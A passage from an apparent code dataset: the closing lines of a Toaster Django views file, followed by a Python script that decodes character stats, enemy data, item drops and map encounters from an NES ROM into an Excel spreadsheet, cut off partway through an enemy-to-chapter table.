toaster_render(request, \"unavailable_artifact.html\")\n except (ObjectDoesNotExist, IOError):\n return toaster_render(request, \"unavailable_artifact.html\")\n\n","repo_name":"openbmc/openbmc","sub_path":"poky/bitbake/lib/toaster/toastergui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":83444,"program_lang":"python","lang":"en","doc_type":"code","stars":1525,"dataset":"github-code","pt":"16"} +{"seq_id":"17821989844","text":"#!/usr/bin/env python3\n\n\"\"\"Dump data in an iNES ROM file.\n\nUsage:\n poetry install\n poetry run ./jvqdump.py input_ines_file_path output_excel_file_path\n\"\"\"\n\nimport argparse\nimport binascii\nimport collections\nimport dataclasses\nimport enum\nimport itertools\nimport operator\nimport struct\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union\n\nimport openpyxl\nimport openpyxl.styles\n\n_ENEMY_GROUP_PATTERN_LIST_ID_COUNT = 155\n_MAP_ID_COUNT = 350\n_MAX_ACTIONS_PER_ENEMY = 8\n_ENEMY_ID_COUNT = 173\n\n\ndef _read_prg_rom(input_ines_file_path: str) -> bytes:\n ines_header_byte_size = 16\n with open(input_ines_file_path, \"rb\") as f:\n header_bytes = f.read(ines_header_byte_size)\n if len(header_bytes) != ines_header_byte_size:\n raise ValueError(\"Invalid iNES header\")\n if header_bytes[0:4] != b\"NES\\x1a\":\n raise ValueError(\"Invalid signature\")\n prg_rom_byte_size = header_bytes[4] * 0x4000\n prg_rom_bytes = f.read(prg_rom_byte_size)\n if len(prg_rom_bytes) != prg_rom_byte_size:\n raise ValueError(\"Insufficient PRG ROM\")\n return prg_rom_bytes\n\n\ndef _decode_string(str_bytes: bytes) -> str:\n byte_to_str = {\n # 0x00: ??\n 0x01: \"あ\",\n 0x02: \"い\",\n 0x03: \"う\",\n 0x04: \"え\",\n 0x05: \"お\",\n 0x06: \"か\",\n 0x07: \"き\",\n 0x08: \"く\",\n 0x09: \"け\",\n 0x0A: \"こ\",\n 0x0B: \"さ\",\n 0x0C: \"し\",\n 0x0D: \"す\",\n 0x0E: \"せ\",\n 0x0F: \"そ\",\n # 0x10: 半濁点\n 0x11: \"た\",\n 0x12: \"ち\",\n 0x13: \"つ\",\n 0x14: \"て\",\n 0x15: \"と\",\n 0x16: \"な\",\n 0x17: \"に\",\n 0x18: \"ぬ\",\n 0x19: \"ね\",\n 0x1A: \"の\",\n 0x1B: \"は\",\n 0x1C: \"ひ\",\n 0x1D: \"ふ\",\n 0x1E: \"へ\",\n 0x1F: \"ほ\",\n 0x20: \"両\",\n 0x21: \"ま\",\n 0x22: \"み\",\n 0x23: \"む\",\n 0x24: \"め\",\n 0x25: \"も\",\n 0x26: \"や\",\n 0x27: \"ゆ\",\n 0x28: \"よ\",\n 0x29: \"ら\",\n 0x2A: \"り\",\n 0x2B: \"る\",\n 0x2C: \"れ\",\n 0x2D: \"ろ\",\n 0x2E: \"わ\",\n 0x2F: \"を\",\n 0x30: \"0\",\n 0x31: \"1\",\n 0x32: \"2\",\n 0x33: \"3\",\n 0x34: \"4\",\n 0x35: \"5\",\n 0x36: \"6\",\n 0x37: \"7\",\n 0x38: \"8\",\n 0x39: \"9\",\n 0x3A: \"!\",\n 0x3B: \"?\",\n 0x3C: \"「\",\n 0x3D: \"/\",\n 0x3E: \"・\",\n 0x3F: \"ん\",\n 0x40: \"■\",\n 0x41: \"ア\",\n 0x42: \"イ\",\n 0x43: \"ウ\",\n 0x44: \"エ\",\n 0x45: \"オ\",\n 0x46: \"カ\",\n 0x47: \"キ\",\n 0x48: \"ク\",\n 0x49: \"ケ\",\n 0x4A: \"コ\",\n 0x4B: \"サ\",\n 0x4C: \"シ\",\n 0x4D: \"ス\",\n 0x4E: \"セ\",\n 0x4F: \"ソ\",\n # 0x50: ??\n 0x51: \"タ\",\n 0x52: \"チ\",\n 0x53: \"ツ\",\n 0x54: \"テ\",\n 0x55: \"ト\",\n 0x56: \"ナ\",\n 0x57: \"ニ\",\n 0x58: \"ヌ\",\n 0x59: \"ネ\",\n 0x5A: \"ノ\",\n 0x5B: \"ハ\",\n 0x5C: \"ヒ\",\n 0x5D: \"フ\",\n 0x5E: \"ー\",\n 0x5F: \"ホ\",\n # 0x60: ??\n 0x61: \"マ\",\n 0x62: \"ミ\",\n 0x63: \"ム\",\n 0x64: \"メ\",\n 0x65: \"モ\",\n 0x66: \"ヤ\",\n 0x67: \"ユ\",\n 0x68: \"ヨ\",\n 0x69: \"ラ\",\n 0x6A: \"◆\",\n 0x6B: \"ル\",\n 0x6C: \"レ\",\n 0x6D: \"ロ\",\n 0x6E: \"ワ\",\n 0x6F: \"超\",\n # 0x70: Frame\n # 0x71: Frame\n # 0x72: Frame\n # 0x73: Frame\n # 0x74: Frame\n # 0x75: Frame\n # 0x76: Frame\n # 0x77: Frame\n 0x78: \"ッ\",\n 0x79: \"ャ\",\n 0x7A: \"ュ\",\n 0x7B: \"ョ\",\n 0x7C: \"ァ\",\n 0x7D: \"っ\",\n 0x7E: \"ゃ\",\n 0x7F: \"ン\",\n 0x80: \"ゅ\",\n 0x81: \"ょ\",\n # 0x82: ??\n 0x83: \"ェ\",\n # 0x84: ??\n # 0x85: ??\n 0x86: \"が\",\n 0x87: \"ぎ\",\n 0x88: \"ぐ\",\n 0x89: \"げ\",\n 0x8A: \"ご\",\n 0x8B: \"ざ\",\n 0x8C: \"じ\",\n 0x8D: \"ず\",\n 0x8E: \"ぜ\",\n 0x8F: \"ぞ\",\n # 0x90: Invalid\n 0x91: \"だ\",\n 0x92: \"ぢ\",\n 0x93: \"づ\",\n 0x94: \"で\",\n 0x95: \"ど\",\n # 0x96: Invalid\n # 0x97: Invalid\n # 0x98: Invalid\n # 0x99: Invalid\n # 0x9A: Invalid\n 0x9B: \"ば\",\n 0x9C: \"び\",\n 0x9D: \"ぶ\",\n 0x9E: \"べ\",\n 0x9F: \"ぼ\",\n # 0xA0: Invalid\n 0xA1: \"ぱ\",\n 0xA2: \"ぴ\",\n 0xA3: \"ぶ\",\n 0xA4: \"ぺ\",\n 0xA5: \"ぽ\",\n 0xA6: \"パ\",\n 0xA7: \"ピ\",\n 0xA8: \"プ\",\n # 0xA9: Invalid\n 0xAA: \"ポ\",\n # 0xAB: Invalid\n # 0xAC: Invalid\n # 0xAD: Invalid\n # 0xAE: Invalid\n # 0xAF: Invalid\n # 0xB0: Invalid\n # 0xB1: Invalid\n # 0xB2: Invalid\n # 0xB3: Invalid\n # 0xB4: Invalid\n # 0xB5: Invalid\n # 0xB6: Invalid\n # 0xB7: Invalid\n # 0xB8: Invalid\n # 0xB9: Invalid\n # 0xBA: Invalid\n # 0xBB: Invalid\n # 0xBC: Invalid\n # 0xBD: Invalid\n # 0xBE: Invalid\n # 0xBF: Invalid\n # 0xC0: Invalid\n # 0xC1: Invalid\n # 0xC2: Invalid\n # 0xC3: Invalid\n # 0xC4: Invalid\n # 0xC5: Invalid\n 0xC6: \"ガ\",\n 0xC7: \"ギ\",\n 0xC8: \"グ\",\n 0xC9: \"ゲ\",\n 0xCA: \"ゴ\",\n 0xCB: \"ザ\",\n 0xCC: \"ジ\",\n 0xCD: \"ズ\",\n 0xCE: \"ゼ\",\n 0xCF: \"ゾ\",\n # 0xD0: Invalid\n 0xD1: \"ダ\",\n 0xD2: \"ヂ\",\n 0xD3: \"ヅ\",\n 0xD4: \"デ\",\n 0xD5: \"ド\",\n # 0xD6: Invalid\n # 0xD7: Invalid\n # 0xD8: Invalid\n # 0xD9: Invalid\n # 0xDA: Invalid\n 0xDB: \"バ\",\n 0xDC: \"ビ\",\n 0xDD: \"ブ\",\n # 0xDE: Invalid\n 0xDF: \"ボ\",\n # 0xE0: Invalid\n # 0xE1: Invalid\n # 0xE2: Invalid\n # 0xE3: Invalid\n # 0xE4: Invalid\n # 0xE5: Invalid\n # 0xE6: Invalid\n # 0xE7: Invalid\n # 0xE8: Invalid\n # 0xE9: Invalid\n # 0xEA: Invalid\n # 0xEB: Invalid\n # 0xEC: Invalid\n # 0xED: Invalid\n # 0xEE: Invalid\n # 0xEF: Invalid\n # 0xF0: Invalid\n # 0xF1: Invalid\n # 0xF2: Invalid\n # 0xF3: Invalid\n # 0xF4: Invalid\n # 0xF5: Invalid\n # 0xF6: Invalid\n # 0xF7: Invalid\n # 0xF8: Invalid\n # 0xF9: Invalid\n # 0xFA: Invalid\n # 0xFB: Invalid\n # 0xFC: Invalid\n # 0xFD: Invalid\n # 0xFE: Invalid\n 0xFF: \" \", # Space\n }\n return \"\".join(byte_to_str[s] for s in str_bytes)\n\n\n@enum.unique\nclass _PlayerCharacterType(enum.Enum):\n JUVEI = \"じゅうべえ\"\n RYUHIME = \"りゅうひめ\"\n WOLF = \"ウルフ・シロ\"\n IWAN = \"イワン・ガンちゃん\"\n ONITAN = \"オニタン\"\n HINOTORI = \"ひのとり\"\n SARUBOSS = \"サルボス\"\n PENTA = \"ペンタ\"\n LUCKY = \"ラッキー\"\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacterLevel:\n level: int\n hp: int # 命\n cp: int # 超力\n attack: int # 攻撃\n defense: int # 守備\n speed: int # スピード\n ten: int # 天の守り\n shin: int # 芯の強さ\n atama: int # 頭の良さ\n experience_required_from_previous_level: int\n accumulated_experience_required: int\n\n\n@dataclasses.dataclass(frozen=True)\nclass _PlayerCharacter:\n player_character_type: _PlayerCharacterType\n max_level: int\n levels: Sequence[_PlayerCharacterLevel]\n\n\ndef _get_player_character_max_level(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> int:\n prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x03C097,\n _PlayerCharacterType.WOLF: 0x03C09C,\n _PlayerCharacterType.RYUHIME: 0x03C098,\n _PlayerCharacterType.IWAN: 0x03C09A,\n _PlayerCharacterType.ONITAN: 0x03C09B,\n _PlayerCharacterType.HINOTORI: 0x03C09D,\n _PlayerCharacterType.SARUBOSS: 0x03C09E,\n _PlayerCharacterType.PENTA: 0x03C09F,\n _PlayerCharacterType.LUCKY: 0x03C0A0,\n }[player_character_type]\n return prg_rom_bytes[prg_rom_address]\n\n\ndef _get_player_character(prg_rom_bytes: bytes, player_character_type: _PlayerCharacterType) -> _PlayerCharacter:\n status_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027713,\n _PlayerCharacterType.WOLF: 0x0278D5,\n _PlayerCharacterType.RYUHIME: 0x027A97,\n _PlayerCharacterType.IWAN: 0x027C59,\n _PlayerCharacterType.ONITAN: 0x027DF0,\n _PlayerCharacterType.HINOTORI: 0x027E4A,\n _PlayerCharacterType.SARUBOSS: 0x027EA4,\n _PlayerCharacterType.PENTA: 0x027EEC,\n _PlayerCharacterType.LUCKY: 0x027F46,\n }[player_character_type]\n experience_start_prg_rom_address = {\n _PlayerCharacterType.JUVEI: 0x027519,\n _PlayerCharacterType.WOLF: 0x02757D,\n _PlayerCharacterType.RYUHIME: 0x0275E1,\n _PlayerCharacterType.IWAN: 0x027645,\n _PlayerCharacterType.ONITAN: 0x002769F,\n _PlayerCharacterType.HINOTORI: 0x0276B3,\n _PlayerCharacterType.SARUBOSS: 0x0276C7,\n _PlayerCharacterType.PENTA: 0x0276D7,\n _PlayerCharacterType.LUCKY: 0x0276EB,\n }[player_character_type]\n max_level = _get_player_character_max_level(prg_rom_bytes, player_character_type)\n experience_unit_byte_size = 2\n status_unit_byte_size = 9\n accumulated_experience_required = 0\n player_character_levels = []\n for level in range(1, max_level + 1):\n status_offset = status_start_prg_rom_address + (level - 1) * status_unit_byte_size\n (hp, cp, attack, defense, speed, ten, shin, atama) = struct.unpack_from(\" _EnemyGroupPatternList:\n prg_rom_address = 0x00F704\n list_id = 0\n while list_id < enemy_group_pattern_list_id:\n if prg_rom_bytes[prg_rom_address] == 0xFF:\n list_id += 1\n prg_rom_address += 1\n enemy_group_pattern_ids = []\n while prg_rom_bytes[prg_rom_address] != 0xFF:\n enemy_group_pattern_ids.append(prg_rom_bytes[prg_rom_address])\n prg_rom_address += 1\n return _EnemyGroupPatternList(enemy_group_pattern_ids=tuple(enemy_group_pattern_ids))\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyGroupPattern:\n enemy_group_size: int\n enemy_group_0_size: int\n enemy_group_0_enemy_id: Optional[int]\n enemy_group_1_size: int\n enemy_group_1_enemy_id: Optional[int]\n enemy_group_2_size: int\n enemy_group_2_enemy_id: Optional[int]\n\n\ndef _get_enemy_group_pattern(prg_rom_bytes: bytes, enemy_group_pattern_id: int) -> _EnemyGroupPattern:\n assert 0 < enemy_group_pattern_id\n prg_rom_address = 0x00FA48\n pattern_id = 0\n while pattern_id < enemy_group_pattern_id:\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n if enemy_group_0_size != 0:\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n if enemy_group_1_size != 0:\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n if enemy_group_2_size != 0:\n prg_rom_address += 1\n pattern_id += 1\n encoded_enemy_group_size = prg_rom_bytes[prg_rom_address]\n enemy_group_size = 0\n prg_rom_address += 1\n enemy_group_0_size = (encoded_enemy_group_size & 0xE0) >> 5\n enemy_group_0_enemy_id = None\n if enemy_group_0_size != 0:\n enemy_group_0_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_1_size = (encoded_enemy_group_size & 0x1C) >> 2\n enemy_group_1_enemy_id = None\n if enemy_group_1_size != 0:\n enemy_group_1_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n enemy_group_2_size = encoded_enemy_group_size & 0x03\n enemy_group_2_enemy_id = None\n if enemy_group_2_size != 0:\n enemy_group_2_enemy_id = prg_rom_bytes[prg_rom_address]\n enemy_group_size += 1\n prg_rom_address += 1\n return _EnemyGroupPattern(\n enemy_group_size=enemy_group_size,\n enemy_group_0_size=enemy_group_0_size,\n enemy_group_0_enemy_id=enemy_group_0_enemy_id,\n enemy_group_1_size=enemy_group_1_size,\n enemy_group_1_enemy_id=enemy_group_1_enemy_id,\n enemy_group_2_size=enemy_group_2_size,\n enemy_group_2_enemy_id=enemy_group_2_enemy_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionId:\n action_ids: Sequence[int]\n\n\ndef _get_enemy_action_id(prg_rom_bytes: bytes, raw_action_id: int) -> _EnemyActionId:\n assert 1 <= raw_action_id\n start_prg_rom_address = 0x00FF93 + (raw_action_id - 1)\n action_id = prg_rom_bytes[start_prg_rom_address]\n if action_id < 0x80:\n return _EnemyActionId(action_ids=tuple([action_id]))\n action_id = (action_id << 1) & 0xFF\n return _EnemyActionId(\n action_ids=tuple(\n [\n prg_rom_bytes[0x00FFEE + action_id],\n prg_rom_bytes[0x00FFEE + action_id + 1],\n ]\n )\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyActionPattern:\n raw_action_id_0: int\n raw_action_id_1: int\n raw_action_id_2: int\n raw_action_id_3: int\n action_id_0: _EnemyActionId\n action_id_1: _EnemyActionId\n action_id_2: _EnemyActionId\n action_id_3: _EnemyActionId\n action_threshold_0: int\n action_threshold_1: int\n action_threshold_2: int\n action_threshold_3: int\n\n\ndef _get_enemy_action_pattern(prg_rom_bytes: bytes, enemy_action_pattern_id: int) -> _EnemyActionPattern:\n assert enemy_action_pattern_id <= 0x3F\n enemy_action_pattern_unit_byte_size = 8\n start_prg_rom_address = 0x00F442 + enemy_action_pattern_id * enemy_action_pattern_unit_byte_size\n enemy_action_pattern = _EnemyActionPattern(\n raw_action_id_0=prg_rom_bytes[start_prg_rom_address],\n raw_action_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n raw_action_id_2=prg_rom_bytes[start_prg_rom_address + 2],\n raw_action_id_3=prg_rom_bytes[start_prg_rom_address + 3],\n action_id_0=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address]),\n action_id_1=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 1]),\n action_id_2=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 2]),\n action_id_3=_get_enemy_action_id(prg_rom_bytes, prg_rom_bytes[start_prg_rom_address + 3]),\n action_threshold_0=prg_rom_bytes[start_prg_rom_address + 4],\n action_threshold_1=prg_rom_bytes[start_prg_rom_address + 5],\n action_threshold_2=prg_rom_bytes[start_prg_rom_address + 6],\n action_threshold_3=prg_rom_bytes[start_prg_rom_address + 7],\n )\n # Validate that the sum of the thresholds should be around 0xFF.\n assert 0xFA <= (enemy_action_pattern.action_threshold_0 + enemy_action_pattern.action_threshold_1 + enemy_action_pattern.action_threshold_2 + enemy_action_pattern.action_threshold_3) <= 0x100\n return enemy_action_pattern\n\n\ndef _aggregate_enemy_action_pattern(enemy_action_pattern: _EnemyActionPattern) -> Dict[int, int]:\n action_threshold_0 = enemy_action_pattern.action_threshold_0\n action_threshold_1 = enemy_action_pattern.action_threshold_1\n action_threshold_2 = enemy_action_pattern.action_threshold_2\n action_threshold_3 = 0x100 - (action_threshold_0 + action_threshold_1 + action_threshold_2)\n assert 0x00 <= action_threshold_3\n threshold_by_action_id: Dict[int, int] = collections.defaultdict(int)\n for action_id in enemy_action_pattern.action_id_0.action_ids:\n threshold_by_action_id[action_id] += action_threshold_0 * 2 // len(enemy_action_pattern.action_id_0.action_ids)\n for action_id in enemy_action_pattern.action_id_1.action_ids:\n threshold_by_action_id[action_id] += action_threshold_1 * 2 // len(enemy_action_pattern.action_id_1.action_ids)\n for action_id in enemy_action_pattern.action_id_2.action_ids:\n threshold_by_action_id[action_id] += action_threshold_2 * 2 // len(enemy_action_pattern.action_id_2.action_ids)\n for action_id in enemy_action_pattern.action_id_3.action_ids:\n threshold_by_action_id[action_id] += action_threshold_3 * 2 // len(enemy_action_pattern.action_id_3.action_ids)\n assert sum(threshold_by_action_id.values()) == 0x100 * 2, sum(threshold_by_action_id.values())\n return threshold_by_action_id\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ActionName:\n action_name_bytes: bytes\n action_name: str\n\n\ndef _get_action_name(prg_rom_bytes: bytes, action_id: int) -> _ActionName:\n if action_id == 0xEE:\n return _ActionName(\n action_name_bytes=b\"\",\n action_name=\"こうげき  \",\n )\n action_name_unit_byte_size = 8\n start_prg_rom_address = 0x02634D + action_id * action_name_unit_byte_size\n action_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + action_name_unit_byte_size - 1]\n return _ActionName(\n action_name_bytes=action_name_bytes,\n action_name=_decode_string(action_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemDropPattern:\n drop_item_id_0: int\n drop_item_id_1: int\n item_drop_threshold: int\n\n\ndef _get_item_drop_pattern(prg_rom_bytes: bytes, item_drop_pattern_id: int) -> _ItemDropPattern:\n assert item_drop_pattern_id <= 0x3F\n item_drop_pattern_unit_byte_size = 3\n start_prg_rom_address = 0xF643 + item_drop_pattern_id * item_drop_pattern_unit_byte_size\n return _ItemDropPattern(\n drop_item_id_0=prg_rom_bytes[start_prg_rom_address],\n drop_item_id_1=prg_rom_bytes[start_prg_rom_address + 1],\n item_drop_threshold=prg_rom_bytes[start_prg_rom_address + 2],\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ItemName:\n item_name_bytes: bytes\n item_name: str\n\n\ndef _get_item_name(prg_rom_bytes: bytes, item_id: int) -> _ItemName:\n assert 0x00 < item_id\n item_name_unit_byte_size = 8\n start_prg_rom_address = 0x026685 + item_id * item_name_unit_byte_size\n item_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + item_name_unit_byte_size - 1]\n return _ItemName(\n item_name_bytes=item_name_bytes,\n item_name=_decode_string(item_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _EnemyName:\n enemy_name_bytes: bytes\n enemy_name: str\n\n\ndef _get_enemy_name(prg_rom_bytes: bytes, enemy_id: int) -> _EnemyName:\n assert 0x00 < enemy_id\n enemy_name_unit_byte_size = 8\n start_prg_rom_address = 0x25AD5 + enemy_id * enemy_name_unit_byte_size\n enemy_name_bytes = prg_rom_bytes[start_prg_rom_address : start_prg_rom_address + enemy_name_unit_byte_size - 1]\n return _EnemyName(\n enemy_name_bytes=enemy_name_bytes,\n enemy_name=_decode_string(enemy_name_bytes),\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Enemy:\n hp: int\n min_hp: int\n max_hp: int\n cp: int\n attack: int\n defense: int\n speed: int\n money: int\n experience: int\n escapable: bool\n attack_twice: bool\n hittability: int\n mihagito_endurance: bool\n kurusu_endurance: bool\n beto_endurance: bool\n choriki_endurance_1: int\n choriki_endurance_2: int\n choriki_endurance_3_4: int\n choriki_endurance_5: int\n choriki_endurance_6: int\n mahuuji_endurance: int\n mahuuji_effectiveness: int\n lullaby_endurance: int\n lullaby_effectiveness: int\n parapa_endurance: int\n parapa_effectiveness: int\n action_pattern_id: int\n item_drop_pattern_id: int\n\n\ndef _decode_enemy_value(enemy_data: Dict[int, int], y: int) -> int:\n assert 0 <= y\n value = ((enemy_data[0x6000] >> y) * 0x100 + enemy_data[0x6001 + y]) & 0x1FF\n bit_count = 0\n for i in range(5):\n ends_with_one = value & 0x01 != 0\n if ends_with_one:\n bit_count += 1\n value = (value >> 1) & 0xFF\n if not ends_with_one:\n break\n if bit_count == 0:\n return value\n elif bit_count <= 3:\n return (value + 1) * (10**bit_count)\n elif bit_count == 4:\n v = (value + 1) * 1000\n if (v & 0x6000) != 0:\n return 0xFFFF\n else:\n # エイりアンドー\n return 0x9C50\n raise ValueError(\"Invalid enemy_data.\")\n\n\ndef _calculate_enemy_hp_range(hp: int) -> Tuple[int, int]:\n diff = min(hp // 8, 0xFF)\n return (hp - diff, hp + diff)\n\n\ndef _get_enemy(prg_rom_bytes: bytes, enemy_id: int) -> _Enemy:\n assert 0 < enemy_id\n enemy_status_unit_byte_size = 0x14\n enemy_status_start_prg_rom_address = 0x00E1C2 + (enemy_id - 1) * enemy_status_unit_byte_size\n enemy_data: Dict[int, int] = {}\n for i in range(enemy_status_unit_byte_size):\n enemy_data[0x6000 + i] = prg_rom_bytes[enemy_status_start_prg_rom_address + i]\n experience = _decode_enemy_value(enemy_data, 0)\n hp = _decode_enemy_value(enemy_data, 1)\n (min_hp, max_hp) = _calculate_enemy_hp_range(hp)\n attack = _decode_enemy_value(enemy_data, 2)\n defense = _decode_enemy_value(enemy_data, 3)\n cp = _decode_enemy_value(enemy_data, 4)\n speed = _decode_enemy_value(enemy_data, 5)\n money = _decode_enemy_value(enemy_data, 6)\n escapable = (enemy_data[0x6008] & 0x04) == 0\n attack_twice = (enemy_data[0x6008] & 0x30) in (0x10, 0x20)\n hittability = (enemy_data[0x6008] & 0xC0) >> 6\n mihagito_endurance = (enemy_data[0x6008] & 0x08) != 0\n kurusu_endurance = not escapable\n beto_endurance = (enemy_data[0x6008] & 0x02) != 0\n # #$C0:属性2(火炎系)\n choriki_endurance_2 = (enemy_data[0x6009] & 0xC0) >> 6\n # #$C0:属性5(電撃系), #$30:属性3-4(水撃系・氷結系), #$0C:属性1(地震系), #$03:属性6(爆発系)\n choriki_endurance_5 = (enemy_data[0x600A] & 0xC0) >> 6\n choriki_endurance_3_4 = (enemy_data[0x600A] & 0x30) >> 4\n choriki_endurance_1 = (enemy_data[0x600A] & 0x0C) >> 2\n choriki_endurance_6 = enemy_data[0x600A] & 0x03\n mahuuji_endurance = (enemy_data[0x600B] & 0xC0) >> 6\n mahuuji_effectiveness = (enemy_data[0x600B] & 0x30) >> 4\n lullaby_endurance = (enemy_data[0x600B] & 0x0C) >> 2\n lullaby_effectiveness = enemy_data[0x600B] & 0x03\n parapa_endurance = (enemy_data[0x600C] & 0x0C) >> 2\n parapa_effectiveness = enemy_data[0x600C] & 0x03\n action_pattern_id = enemy_data[0x6009] & 0x3F\n item_drop_pattern_id = enemy_data[0x600D] & 0x3F\n return _Enemy(\n hp=hp,\n min_hp=min_hp,\n max_hp=max_hp,\n cp=cp,\n attack=attack,\n defense=defense,\n speed=speed,\n experience=experience,\n money=money,\n escapable=escapable,\n attack_twice=attack_twice,\n hittability=hittability,\n mihagito_endurance=mihagito_endurance,\n kurusu_endurance=kurusu_endurance,\n beto_endurance=beto_endurance,\n choriki_endurance_1=choriki_endurance_1,\n choriki_endurance_2=choriki_endurance_2,\n choriki_endurance_3_4=choriki_endurance_3_4,\n choriki_endurance_5=choriki_endurance_5,\n choriki_endurance_6=choriki_endurance_6,\n mahuuji_endurance=mahuuji_endurance,\n mahuuji_effectiveness=mahuuji_effectiveness,\n lullaby_endurance=lullaby_endurance,\n lullaby_effectiveness=lullaby_effectiveness,\n parapa_endurance=parapa_endurance,\n parapa_effectiveness=parapa_effectiveness,\n action_pattern_id=action_pattern_id,\n item_drop_pattern_id=item_drop_pattern_id,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass _Map:\n enemy_group_pattern_list_id: int\n encounter_threshold_id: int\n\n\ndef _get_map(prg_rom_bytes: bytes, map_id: int) -> _Map:\n map_unit_byte_size = 12\n start_prg_rom_address = 0x8004 + map_id * map_unit_byte_size\n v008F = prg_rom_bytes[start_prg_rom_address + 1]\n if v008F == 0x01:\n enemy_group_pattern_list_id = 0x78\n elif v008F == 0x02:\n enemy_group_pattern_list_id = 0x00\n else:\n v0091 = prg_rom_bytes[start_prg_rom_address + 3]\n enemy_group_pattern_list_id = v0091\n if enemy_group_pattern_list_id >= 0x9B:\n enemy_group_pattern_list_id = 0x01\n v0098 = prg_rom_bytes[start_prg_rom_address + 10]\n encounter_threshold_id = v0098 >> 5\n return _Map(enemy_group_pattern_list_id=enemy_group_pattern_list_id, encounter_threshold_id=encounter_threshold_id)\n\n\n_LEFT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"left\", vertical=\"top\")\n_RIGHT_ALIGNMENT = openpyxl.styles.Alignment(horizontal=\"right\", vertical=\"top\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass _ColumnStyle:\n caption: str\n cell_alignment: openpyxl.styles.Alignment = _LEFT_ALIGNMENT\n\n\ndef _fill_worksheet_header_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle]) -> None:\n for column_index, header in enumerate(header_row, 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = header.caption\n\n\ndef _fill_worksheet_row(worksheet: openpyxl.worksheet.worksheet.Worksheet, row_index: int, header_row: List[_ColumnStyle], row: List[Any]) -> None:\n for column_index, (header_column, column) in enumerate(zip(header_row, row), 1):\n cell = worksheet.cell(column=column_index, row=row_index)\n cell.value = column\n cell.alignment = header_column.cell_alignment\n\n\ndef _fill_player_character(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"キャラクター名\"),\n _ColumnStyle(caption=\"最大レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"レベル\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"守備\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"天の守り\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"芯の強さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"頭の良さ\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"前レベルからの必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"累積必要経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for player_character_type in _PlayerCharacterType:\n player_character = _get_player_character(prg_rom_bytes, player_character_type)\n for level in player_character.levels:\n row = [\n player_character.player_character_type.value,\n player_character.max_level,\n level.level,\n level.hp,\n level.cp,\n level.attack,\n level.defense,\n level.speed,\n level.ten,\n level.shin,\n level.atama,\n level.experience_required_from_previous_level,\n level.accumulated_experience_required,\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_chapter_name_of_enemy(enemy_id: int) -> str:\n # NOTE: This list may be incorrect.\n return {\n 0x01: \"ボス\", # ウシまつ\n 0x02: \"ボス\", # おおなまず\n 0x04: \"1の巻\", # どくまんじゅう\n 0x05: \"1の巻\", # レッドスネーク\n 0x06: \"1の巻\", # しろぼうず\n 0x07: \"1の巻\", # カマおとこ\n 0x08: \"ボス\", # まむしおとこ\n 0x09: \"1の巻\", # フライングバム\n 0x0A: \"1の巻\", # スカルバット\n 0x0B: \"1の巻\", # ダイキチ\n 0x0C: \"1の巻\", # へルラッツ\n 0x0D: \"1の巻\", # アッカンべー\n 0x0E: \"1の巻\", # へらへら\n 0x0F: \"1の巻\", # クモジン\n 0x10: \"1の巻\", # からくりマン\n 0x11: \"1の巻\", # ブラックマン\n 0x12: \"1の巻\", # かげにん\n 0x13: \"1の巻\", # にんけん\n 0x14: \"ボス\", # デビルクローン\n 0x15: \"2の巻\", # べムガー\n 0x16: \"2の巻\", # デスグりーン\n 